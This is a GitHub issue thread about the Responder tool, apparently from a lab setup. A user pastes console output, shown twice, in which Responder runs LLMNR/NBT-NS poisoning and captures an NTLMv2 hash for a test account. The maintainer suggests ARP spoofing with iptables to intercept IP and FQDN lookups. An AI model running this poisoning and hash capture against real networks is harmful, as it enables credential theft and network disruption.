lgandx
commented
3 months ago Who said it should?
If you want to catch those, you'll need to ARP with prerouting iptables rules.
Disruption will therefore occur.
On Tue, Jul 2, 2024, 8:31 PM MiMaz7707 @.***> wrote:
Hello,
it work fine if the victime use hostname in the UNC path, but it doesn't if the victime use server ip address or the fqdn.
`responder -I eth0 -dwv _ .----.-----.-----.-----.-----.-----.--| |.-----.----. | | -| --| | | | || - *| | || ||| ||||||| | |*_|
NBT-NS, LLMNR & MDNS Responder 3.1.4.0To support this project: Github -> https://github.com/sponsors/lgandx Paypal -> https://paypal.me/PythonResponder
Author: Laurent Gaffie @.***) To kill this script hit CTRL-C
[+] Poisoners: LLMNR [ON] NBT-NS [ON] MDNS [ON] DNS [ON] DHCP [ON]
[+] Servers: HTTP server [ON] HTTPS server [ON] WPAD proxy [ON] Auth proxy [OFF] SMB server [ON] Kerberos server [ON] SQL server [ON] FTP server [ON] IMAP server [ON] POP3 server [ON] SMTP server [ON] DNS server [ON] LDAP server [ON] MQTT server [ON] RDP server [ON] DCE-RPC server [ON] WinRM server [ON] SNMP server [OFF]
[+] HTTP Options: Always serving EXE [OFF] Serving EXE [OFF] Serving HTML [OFF] Upstream Proxy [OFF]
[+] Poisoning Options: Analyze Mode [OFF] Force WPAD auth [OFF] Force Basic Auth [OFF] Force LM downgrade [OFF] Force ESS downgrade [OFF]
[+] Generic Options: Responder NIC [eth0] Responder IP [192.168.117.200] Responder IPv6 [fe80::9024:b852:9137:c6f] Challenge set [random] Don't Respond To Names ['ISATAP', 'ISATAP.LOCAL']
[+] Current Session Variables: Responder Machine Name [WIN-OE0U3JW4FXX] Responder Domain Name [WYT3.LOCAL] Responder DCE-RPC Port [46345]
[+] Listening for events...
[ ] [LLMNR] Poisoned answer sent to fe80::4980:feb4:6fae:992d for name S [] [NBT-NS] Poisoned answer sent to 192.168.117.10 for name S (service: File Server) [ ] [LLMNR] Poisoned answer sent to 192.168.117.10 for name S [] [LLMNR] Poisoned answer sent to 192.168.117.10 for name S [*] [LLMNR] Poisoned answer sent to fe80::4980:feb4:6fae:992d for name S [SMB] NTLMv2-SSP Client : fe80::4980:feb4:6fae:992d [SMB] NTLMv2-SSP Username : MYLAB\test [SMB] NTLMv2-SSP Hash : test::MYLAB:d2f4d55a1d326bac:D46E471C6F7E781439635BA527C2C347:010100000000000080AEA9FFDDCCDA018E011B63B184DEBE0000000002000800570059005400330001001E00570049004E002D004F0045003000550033004A005700340046005800580004003400570049004E002D004F0045003000550033004A00570034004600580058002E0057005900540033002E004C004F00430041004C000300140057005900540033002E004C004F00430041004C000500140057005900540033002E004C004F00430041004C000700080080AEA9FFDDCCDA01060004000200000008003000300000000000000001000000002000000056638E940A2EAC0BE9E6C03440C4574E6C72404BC79D31E9D138D6E79566580A0010000000000000000000000000000000000009000C0063006900660073002F005300000000000000000000000000 `
— Reply to this email directly, view it on GitHub https://github.com/lgandx/Responder/issues/280, or unsubscribe https://github.com/notifications/unsubscribe-auth/AAC5Q2G6B3FJGEM3N3WF5QLZKMZ3RAVCNFSM6AAAAABKIOVJVGVHI2DSMVQWIX3LMV43ASLTON2WKOZSGM4DOMZTGQZDKNQ . You are receiving this because you are subscribed to this thread.Message ID: @.***>
danbinns-ss
MiMaz7707
Hello,
it work fine if the victime use hostname in the UNC path, but it doesn't if the victime use server ip address or the fqdn.
`responder -I eth0 -dwv .----.-----.-----.-----.-----.-----.--| |.-----.----. | | -| --| | | | || -| _| || |__|| |_||_|||___|| |__|
To support this project: Github -> https://github.com/sponsors/lgandx Paypal -> https://paypal.me/PythonResponder
Author: Laurent Gaffie (laurent.gaffie@gmail.com) To kill this script hit CTRL-C
[+] Poisoners: LLMNR [ON] NBT-NS [ON] MDNS [ON] DNS [ON] DHCP [ON]
[+] Servers: HTTP server [ON] HTTPS server [ON] WPAD proxy [ON] Auth proxy [OFF] SMB server [ON] Kerberos server [ON] SQL server [ON] FTP server [ON] IMAP server [ON] POP3 server [ON] SMTP server [ON] DNS server [ON] LDAP server [ON] MQTT server [ON] RDP server [ON] DCE-RPC server [ON] WinRM server [ON] SNMP server [OFF]
[+] HTTP Options: Always serving EXE [OFF] Serving EXE [OFF] Serving HTML [OFF] Upstream Proxy [OFF]
[+] Poisoning Options: Analyze Mode [OFF] Force WPAD auth [OFF] Force Basic Auth [OFF] Force LM downgrade [OFF] Force ESS downgrade [OFF]
[+] Generic Options: Responder NIC [eth0] Responder IP [192.168.117.200] Responder IPv6 [fe80::9024:b852:9137:c6f] Challenge set [random] Don't Respond To Names ['ISATAP', 'ISATAP.LOCAL']
[+] Current Session Variables: Responder Machine Name [WIN-OE0U3JW4FXX] Responder Domain Name [WYT3.LOCAL] Responder DCE-RPC Port [46345]
[+] Listening for events...
[] [LLMNR] Poisoned answer sent to fe80::4980:feb4:6fae:992d for name S [] [NBT-NS] Poisoned answer sent to 192.168.117.10 for name S (service: File Server) [] [LLMNR] Poisoned answer sent to 192.168.117.10 for name S [] [LLMNR] Poisoned answer sent to 192.168.117.10 for name S [*] [LLMNR] Poisoned answer sent to fe80::4980:feb4:6fae:992d for name S [SMB] NTLMv2-SSP Client : fe80::4980:feb4:6fae:992d [SMB] NTLMv2-SSP Username : MYLAB\test [SMB] NTLMv2-SSP Hash : test::MYLAB:d2f4d55a1d326bac:D46E471C6F7E781439635BA527C2C347:010100000000000080AEA9FFDDCCDA018E011B63B184DEBE0000000002000800570059005400330001001E00570049004E002D004F0045003000550033004A005700340046005800580004003400570049004E002D004F0045003000550033004A00570034004600580058002E0057005900540033002E004C004F00430041004C000300140057005900540033002E004C004F00430041004C000500140057005900540033002E004C004F00430041004C000700080080AEA9FFDDCCDA01060004000200000008003000300000000000000001000000002000000056638E940A2EAC0BE9E6C03440C4574E6C72404BC79D31E9D138D6E79566580A0010000000000000000000000000000000000009000C0063006900660073002F005300000000000000000000000000 `